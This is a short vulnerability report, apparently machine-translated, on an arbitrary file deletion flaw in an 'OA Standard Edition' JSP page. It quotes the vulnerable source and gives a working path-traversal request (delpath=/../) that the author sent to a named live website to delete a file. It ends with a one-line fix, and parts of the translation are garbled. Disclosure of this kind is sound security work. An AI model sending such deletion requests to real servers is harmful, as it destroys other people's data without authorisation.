Arbitrary File Operations for OA Standard Edition

Arbitrary File Operations for OA Standard Edition

In fact, it is the deletion of any file. The deletion function is well positioned, so the title is concealed.

This arbitrary file can be deleted only in windows because it is a coincidence that the program does not kill it.



Vulnerability file: defaultroot/information_manager/information_deleteFile.jsp
 

<%@ include file="/public/common/include_common_header.jsp"%><%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%String fileName = (String) request.getParameter("delfile");String path = (String) request.getParameter("delpath");if(fileName != null || "null".equals(fileName)){    String realPath = request.getRealPath("/");    File del = new File(realPath+"\\upload\\"+path,fileName);      if(del.exists() && del.isFile()){        del.delete();    }}%><script language="javascript"><!--parent.document.all.oldFileLink.style.display = 'none';parent.document.all.fileLinkContent.value = '';parent.document.all.fileLinkContentHidd.value = '';//--></script>

File del = new File (realPath + "\ upload \" + path, fileName); this line of code is problematic, however, because the code is written as \ upload \, in linux, aaa.com/a/ B ?upload=xxxx.jspis not a normal file (of course, some jsp settings are also acceptable), but there is no difference between \ and/in windows, therefore, any file is deleted.

To prove the authenticity of the vulnerability, I found a test site for windows:

1. http://www.qlyxjy.cn: 8080/defaultroot/wooyun. jsp true 200
 

2. http://www.qlyxjy.cn: 8080/defaultroot/information_manager/information_deleteFile.jsp? Delfile = wooyun. jsp & delpath = /../

3. Try again and access wooyun. jsp has been deleted, 404.



To facilitate Cert testing, a.txt was uploaded again for harmless testing.
 

 

Solution:

Filter ..